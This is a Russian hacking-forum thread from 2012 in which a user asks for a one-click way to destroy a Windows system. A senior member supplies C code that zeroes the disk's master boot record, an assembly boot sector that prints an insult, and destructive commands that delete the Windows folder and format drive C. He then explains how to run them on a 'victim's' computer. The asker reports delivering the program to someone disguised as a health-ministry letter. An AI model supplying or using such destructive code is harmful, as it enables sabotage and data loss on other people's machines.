Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - флэшка для удаления системного раздела
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Администрирование / Windows RSS подписка на сообщения с форума Subscribe
Администрирование Microsoft Windows (9x,XP,2003,Vista)

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 3690
флэшка для удаления системного раздела
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
k86-1


Novice
# | Сообщение добавлено 28.05.2012 16:13:53
всем привет!
 
у меня вопрос:
существует ли в природе софтина,вирус,команда бат или хоть что нибудь что может буквально одним кликом уничтожить систему из под которой оно и запущено?
или автоматом при запуске винды или автозапуском с флэхи?
Сказать спасибо Ответить Цитировать

codemaster




Platinum Member
# | Сообщение добавлено 28.05.2012 19:19:12
Отредактировано 28.05.2012 19:24:23 by codemaster
ну например программа на си:
C++

HANDLE hFile;
void *stub;
DWORD readed;
stub=malloc(512);
memset(stub,0,512);
hFile=CreateFile("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
WriteFile(hFile,stub,512,&readed,NULL);
CloseHandle(hFile);
 
при следующей загрузке биос не сможет найти MBR на жоском диске, но опытный юзер пропишет в консоле восстановления венды fixmbr и все станет как было. по крайней мере должно :D
 
более чоткие кодеры сначала пишут код для бутсектора на ASM, потом снимают с нее дамп и пишут в мбр. получается намного веселее. например:
 
Text

USE16
;------------ загрузочный сектор ---------------------
        org     7C00h
EntryPoint:
        mov     ax, cs              ;сегмент кода
        cli               ; запрещаем прерывания 
mov     ss, ax              ;зададим  сегмент стэка, кода, данных - все в одном месте
        mov     ds, ax              
        mov     es, ax              
        mov     sp, EntryPoint       ; зададим адрес старта программы как вершина стека
        sti               ; разрешаем прерывания т.к. уже можно нормально с ними работать
        cld               ; ставим флаг направления
        mov     ax, 3                ; 80x25
        int     10h
        xor     dx, dx              ; X = 0, Y = 0
        mov     bx, 15              ; цвет
        mov     ax, 1301h    ; AL = 1  Передвигать курсор , AH = 13h Вывод строки
        mov     bp, BootMsg  ; адрес сообщения
        mov     cx, BootMsgEnd - BootMsg
        int     10h    ; выводим текст
xor     ax, ax              ; AH = 0 (ожидать нажатие)
        int     16h    ; ждем нажатие клавиши
        jmp     0FFFFh:0000h ; reboot
 
;------------ данные загрузочного сектора--------------
BootMsg db "владелец компа гей и лох :D"
BootMsgEnd:
 
TIMES   510-($-$$) DB 0    ; Заполняем оставшееся пространство от 500 байт нулями
DW      0AA55h                        ; Сигнатура конца загрузочного сектора
 
 

существуют более простые методы убить форточки, но они не интересные. например в командной строке пропиши:

del c:\windows\*.*
или

format c:\ /fs:NTFS /q

 
Сказать спасибо Ответить Цитировать

k86-1


Novice
# | Сообщение добавлено 29.05.2012 03:15:13
хм...вариант №1 сохраняем,придаем расширение дописываем авторан и все?
это как защита от совсем дерева.
это дерево не запустит мбр
Сказать спасибо Ответить Цитировать

codemaster




Platinum Member
# | Сообщение добавлено 29.05.2012 07:23:08
нет. создаем программу на си, вставляем код, компилируем, бинарник запускаем у жертвы на компьютере.
если второй вариант, то компилируем mbr-обираз fasm-ом, снимаем HEX-дамп, и переписываем программу на си чтобы она записывала образ в mbr, вместо того чтобы обнулять его
 
Сказать спасибо Ответить Цитировать

k86-1


Novice
# | Сообщение добавлено 29.05.2012 15:32:44
jj jf  i7uu,;
!!!!
спасибо!
пациент даже не мучался-с автораном не заморачивался,послал письмо от минздрава.
он же авторитет.
дерево все сделало своими руками.
спасибо.
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Разное » Re: Помощь в скачивании платного файла
  • Взлом и безопасность / Разное » Помощь в скачивании платного файла
  • Разное / Куплю, приму в дар » куплю | ваш аккаунта | получение нового | описание внутри
  • Разное / Предложения работы » Специалиста
  • Downloads / Другое » Re: Нужна база емайл адресов юр. лиц
  • Downloads / Другое » Нужна база емайл адресов юр. лиц
  • Разное / Предложения работы » Нужен взлом mail и gmail почты
  • Взлом и безопасность / Разное » Re: Нужна помощь в скачивании файла
  • Взлом и безопасность / Разное » Нужна помощь в скачивании файла
  • Разное / Предложения работы » требуется взлом почт на постоянной основе

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}